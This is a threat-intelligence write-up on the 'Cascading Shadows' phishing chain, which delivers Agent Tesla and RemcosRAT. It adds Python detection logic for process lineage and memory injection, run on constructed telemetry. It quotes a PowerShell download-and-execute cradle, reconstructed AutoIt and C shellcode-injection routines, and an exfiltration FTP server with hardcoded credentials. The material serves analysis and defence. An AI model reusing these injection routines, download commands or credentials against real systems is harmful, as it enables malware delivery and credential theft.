A sophisticated phishing campaign leveraging a multi-layered attack chain dubbed “Cascading Shadows” was uncovered by Palo Alto Networks’ Unit 42 researchers in December 2024.
This campaign delivers malware families like Agent Tesla, RemcosRAT, and XLoader through a sequence of deliberately fragmented stages designed to bypass traditional security tools and complicate forensic analysis.
The attackers used deceptive emails disguised as order release requests, tricking victims into opening malicious .7z archive attachments. Once activated, the infection chain progresses through JavaScript-encoded (.jse) files and PowerShell scripts, and culminates in either .NET or AutoIt-compiled executables that inject the final payloads into legitimate system processes.
The attack’s modular design ensures no single stage reveals the full malicious intent. Initial phishing emails, often written in Croatian, impersonate legitimate business communications, such as payment confirmations or order reviews.
The attached .7z archive contains a .jse file masquerading as a document (e.g., doc00290320092.jse). When executed, this script downloads a PowerShell payload from domains like files.catbox[.]moe, which subsequently retrieves either a .NET or AutoIt dropper.
This bifurcation in execution paths—a hallmark of the Cascading Shadows chain—enhances resilience against detection by allowing attackers to switch payloads dynamically.
Palo Alto Networks analysts noted that the campaign’s reliance on process hollowing distinguishes it from conventional malware delivery methods.
By injecting decrypted shellcode into trusted processes like RegAsm.exe or RegSvcs.exe, the malware operates under the guise of legitimate Microsoft utilities.
This technique, combined with minimal obfuscation at early stages, allows the attack chain to evade sandbox analysis while maintaining operational flexibility.
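The chain described above (a .jse script launching PowerShell that pulls a dropper, which then starts RegSvcs.exe or RegAsm.exe as a hollowing target) leaves a distinctive process lineage. The following detection logic is an added example, not code from Unit 42 or the original article: it runs over constructed Sysmon-style events (process creation and CreateRemoteThread records, which are assumptions, not captured telemetry), rebuilds the parent chain, and flags the script-host-to-PowerShell download stage, argument-less RegSvcs/RegAsm launches from user-writable locations, and remote threads created into those utilities, while leaving a build-tool invocation of RegAsm.exe alone.

```python
import re

# Constructed sample telemetry in a Sysmon-like shape (not real events from the
# campaign). EventID 1 = process creation, EventID 8 = CreateRemoteThread.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 4100, "ParentProcessId": 3200,
     "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Program Files\7-Zip\7zFM.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\u\AppData\Local\Temp\doc00290320092.jse"'},
    {"EventID": 1, "ProcessId": 4180, "ParentProcessId": 4100,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('hxxps://files.catbox[.]moe/stage2')"},
    {"EventID": 1, "ProcessId": 4220, "ParentProcessId": 4180,
     "Image": r"C:\Users\u\AppData\Local\Temp\dropper.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"C:\Users\u\AppData\Local\Temp\dropper.exe"},
    {"EventID": 1, "ProcessId": 4260, "ParentProcessId": 4220,
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "ParentImage": r"C:\Users\u\AppData\Local\Temp\dropper.exe",
     "CommandLine": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"},
    {"EventID": 8, "SourceProcessId": 4220, "TargetProcessId": 4260,
     "SourceImage": r"C:\Users\u\AppData\Local\Temp\dropper.exe",
     "TargetImage": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"},
    # Benign control: a build registering a COM assembly with RegAsm.exe
    {"EventID": 1, "ProcessId": 5000, "ParentProcessId": 4900,
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
     "CommandLine": r"RegAsm.exe /codebase C:\build\MyComponent.dll"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DOTNET_UTILS = {"regsvcs.exe", "regasm.exe"}
BUILD_PARENTS = {"msbuild.exe", "devenv.exe"}
USER_WRITABLE = re.compile(r"\\(Users|Temp|AppData|ProgramData)\\", re.I)
DOWNLOAD_CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def has_arguments(cmdline):
    """True if anything follows the executable token (quoted or bare)."""
    cmdline = cmdline.strip()
    m = re.match(r'"[^"]*"|\S+', cmdline)
    return bool(m) and cmdline[m.end():].strip() != ""


def ancestry(pid, procs):
    """Walk ParentProcessId links; return ancestor image basenames, nearest first."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(basename(procs[pid]["ParentImage"]))
        pid = procs[pid]["ParentProcessId"]
    return chain


def analyze(events):
    procs = {e["ProcessId"]: e for e in events if e["EventID"] == 1}
    findings = []
    for e in events:
        if e["EventID"] == 1:
            img, parent = basename(e["Image"]), basename(e["ParentImage"])
            # Stage 2: script host spawning PowerShell that fetches the next stage
            if img == "powershell.exe" and parent in SCRIPT_HOSTS and DOWNLOAD_CRADLE.search(e["CommandLine"]):
                findings.append(("script_host_powershell_download", e["ProcessId"]))
            # Stage 4: RegSvcs/RegAsm started with no assembly to register, or from a
            # user-writable path, outside a build-tool context -> hollowing target
            if img in DOTNET_UTILS and parent not in BUILD_PARENTS:
                if not has_arguments(e["CommandLine"]) or USER_WRITABLE.search(e["ParentImage"]):
                    findings.append(("dotnet_utility_hollowing_target", e["ProcessId"]))
                    if SCRIPT_HOSTS & set(ancestry(e["ProcessId"], procs)):
                        findings.append(("cascading_chain_from_script_host", e["ProcessId"]))
        elif e["EventID"] == 8 and basename(e["TargetImage"]) in DOTNET_UTILS:
            findings.append(("remote_thread_into_dotnet_utility", e["TargetProcessId"]))
    return findings


if __name__ == "__main__":
    for name, pid in analyze(SAMPLE_EVENTS):
        print(f"{name}: pid {pid}")
```

The lineage walk matters more than any single rule: an argument-less RegSvcs.exe on its own is noisy, but one whose ancestry passes through wscript.exe and a PowerShell download cradle is the full Cascading Shadows shape and deserves an alert rather than a low-severity log entry.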
Despite its complexity, Advanced WildFire’s memory-scanning capabilities successfully identified all stages, underscoring the importance of behavioral detection in countering layered threats.
One of the campaign’s most novel aspects is its use of AutoIt-compiled executables, a less common approach in modern malware distribution.
AutoIt, a scripting language for automating Windows GUI interactions, is repurposed here to decrypt and execute shellcode.
The script within the AutoIt binary (e.g., c93e37e35c4c7f767a5bdab8341d8c2351edb769a41b0c9c229c592dbfe14ff2) contains an encrypted payload that dynamically resolves API calls to evade static analysis.
The script writes the decrypted shellcode to memory before injecting it into RegSvcs.exe.
; Illustrative reconstruction of the dropper's decrypt-and-inject routine.
; _AES_Decrypt and _InjectShellcode stand for the sample's own helper routines, not standard AutoIt UDFs.
Func DecryptPayload()
    Local $encrypted = "9A3F...DAC1" ; Truncated AES-encrypted shellcode
    Local $key = "B2E8...F7A9"
    Local $decrypted = _AES_Decrypt($encrypted, $key)
    ; Run() returns the PID of the hidden RegSvcs.exe instance that serves as the injection target
    Local $process = Run("RegSvcs.exe", "", @SW_HIDE)
    _InjectShellcode($process, $decrypted)
EndFunc
The shellcode employs a reflective loading technique to execute a .NET executable in memory, bypassing disk-based antivirus scans.
During debugging in IDA Pro, researchers traced the execution flow to the DLLCALLADDRESS function, which resolves critical API addresses like VirtualAlloc and CreateRemoteThread.
This enables the shellcode to allocate memory in the target process, write the decrypted .NET payload, and initiate execution—all without leaving artifacts on the filesystem.
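An injection like the one just described still leaves memory-resident evidence even when nothing touches disk, which is what memory scanning keys on: private (non-image-backed) regions with execute permission, a PE header sitting in a region no module maps, and a main-module header that no longer matches the executable on disk. The following triage routine is an added example, not Unit 42's or the article's code; it builds minimal PE headers with struct so the sample runs offline, and the memory map of the "RegSvcs.exe" process and the on-disk headers it is compared against are constructed assumptions, not a capture from the campaign.

```python
import struct

MEM_PRIVATE, MEM_IMAGE = 0x20000, 0x1000000
PAGE_READONLY, PAGE_READWRITE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE = 0x02, 0x04, 0x20, 0x40


def build_pe_header(entry_point, image_base, pe32plus=False):
    """Construct a minimal DOS stub + NT headers (enough for entry point / image base)."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    if pe32plus:
        opt = struct.pack("<HBBIIIIIQ", 0x20B, 14, 0, 0, 0, 0, entry_point, 0x1000, image_base)
        machine = 0x8664
    else:
        opt = struct.pack("<HBBIIIIIII", 0x10B, 14, 0, 0, 0, 0, entry_point, 0x1000, 0x2000, image_base)
        machine = 0x14C
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PtrToSymTab, NumSyms, SizeOfOptHdr, Characteristics
    file_hdr = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, len(opt), 0x102)
    return dos + b"PE\0\0" + file_hdr + opt


def parse_pe_header(buf):
    """Return (AddressOfEntryPoint, ImageBase) from raw header bytes, or None if not a PE."""
    if len(buf) < 0x40 or buf[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    opt = e_lfanew + 4 + 20                      # past "PE\0\0" and IMAGE_FILE_HEADER
    if buf[e_lfanew:e_lfanew + 4] != b"PE\0\0" or len(buf) < opt + 32:
        return None
    magic = struct.unpack_from("<H", buf, opt)[0]
    entry = struct.unpack_from("<I", buf, opt + 16)[0]
    if magic == 0x20B:                           # PE32+: 8-byte ImageBase at +24
        return entry, struct.unpack_from("<Q", buf, opt + 24)[0]
    if magic == 0x10B:                           # PE32: 4-byte ImageBase at +28
        return entry, struct.unpack_from("<I", buf, opt + 28)[0]
    return None


# Constructed: headers as they appear on disk for the modules of interest.
DISK_HEADERS = {
    "RegSvcs.exe": build_pe_header(entry_point=0x2A40, image_base=0x400000),
    "ntdll.dll": build_pe_header(entry_point=0x0, image_base=0x77000000),
}

# Constructed memory map of a hollowed RegSvcs.exe (VirtualQueryEx-style fields plus
# the first bytes of each region). The main image's header now belongs to the payload.
SAMPLE_REGIONS = [
    {"base": 0x00400000, "size": 0x1000, "type": MEM_IMAGE, "protect": PAGE_READONLY,
     "module": "RegSvcs.exe", "head": build_pe_header(entry_point=0x1B3C0, image_base=0x400000)},
    {"base": 0x00401000, "size": 0xA000, "type": MEM_IMAGE, "protect": PAGE_EXECUTE_READ,
     "module": "RegSvcs.exe", "head": b"\x55\x8b\xec\x83\xec\x10"},
    {"base": 0x00600000, "size": 0x10000, "type": MEM_PRIVATE, "protect": PAGE_READWRITE,
     "module": None, "head": b"\x00" * 8},                      # ordinary heap
    {"base": 0x02A00000, "size": 0x1000, "type": MEM_PRIVATE, "protect": PAGE_EXECUTE_READWRITE,
     "module": None, "head": b"\xfc\x48\x83\xe4\xf0\xe8"},      # position-independent stub
    {"base": 0x03100000, "size": 0x36000, "type": MEM_PRIVATE, "protect": PAGE_EXECUTE_READWRITE,
     "module": None, "head": build_pe_header(entry_point=0x1B3C0, image_base=0x400000)},  # reflectively loaded PE
    {"base": 0x77000000, "size": 0x100000, "type": MEM_IMAGE, "protect": PAGE_READONLY,
     "module": "ntdll.dll", "head": DISK_HEADERS["ntdll.dll"]},
]


def scan_regions(regions, disk_headers):
    """Flag the three memory-resident injection indicators described in the lead-in."""
    findings = []
    for r in regions:
        executable = r["protect"] in (PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE)
        pe = parse_pe_header(r["head"])
        if r["type"] != MEM_IMAGE and executable:
            findings.append(("executable_private_region", r["base"]))
        if r["type"] != MEM_IMAGE and pe is not None:
            findings.append(("unbacked_pe_image", r["base"]))
        if r["type"] == MEM_IMAGE and pe is not None and r["module"] in disk_headers:
            if pe != parse_pe_header(disk_headers[r["module"]]):
                findings.append(("header_mismatch_vs_disk", r["base"]))
    return findings


if __name__ == "__main__":
    for name, base in scan_regions(SAMPLE_REGIONS, DISK_HEADERS):
        print(f"{name} at {base:#010x}")
```

Executable private regions are the noisiest of the three checks (JIT engines, including the .NET runtime itself, create them legitimately), so in practice the header mismatch and the unbacked PE image carry the weight; in a real scanner the region bytes come from ReadProcessMemory and the disk header from the mapped file, and the comparison should extend to section tables rather than stop at the entry point and image base as this example does.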
#include <windows.h>
#include <string.h>
typedef LPVOID (WINAPI *VirtualAlloc_t)(LPVOID, SIZE_T, DWORD, DWORD);
extern unsigned char *decryptedPayload;   // decrypted .NET payload handed over by the loader
extern size_t payloadSize;

void ShellcodeMain() {
    // Resolve VirtualAlloc at runtime instead of importing it, so the stub carries no telltale import
    HMODULE kernel32 = LoadLibraryA("kernel32.dll");
    VirtualAlloc_t virtAlloc = (VirtualAlloc_t)GetProcAddress(kernel32, "VirtualAlloc");
    LPVOID mem = virtAlloc(NULL, payloadSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    // Decrypt and copy Agent Tesla variant into memory
    memcpy(mem, decryptedPayload, payloadSize);
    // Simplified to an in-process thread; the remote variant writes with WriteProcessMemory and starts it via CreateRemoteThread
    CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)mem, NULL, 0, NULL);
}
The final payload, an Agent Tesla variant, exfiltrates credentials via FTP to servers like ftp.jeepcommerce[.]rs using hardcoded credentials (e.g., username: kel-bin@jeepcommerce[.]rs, password: Jhrn) GcpiYQ7).
By compartmentalizing each stage and leveraging legitimate tools, the Cascading Shadows chain exemplifies the growing trend of “living-off-the-land” tactics in cyber espionage.
Unit 42 emphasizes that while the attack chain is intricate, defenses like Cortex XDR’s Behavioral Threat Protection can detect process injection anomalies. Combined with Advanced WildFire’s multi-stage analysis, organizations can mitigate such threats despite their evolving complexity.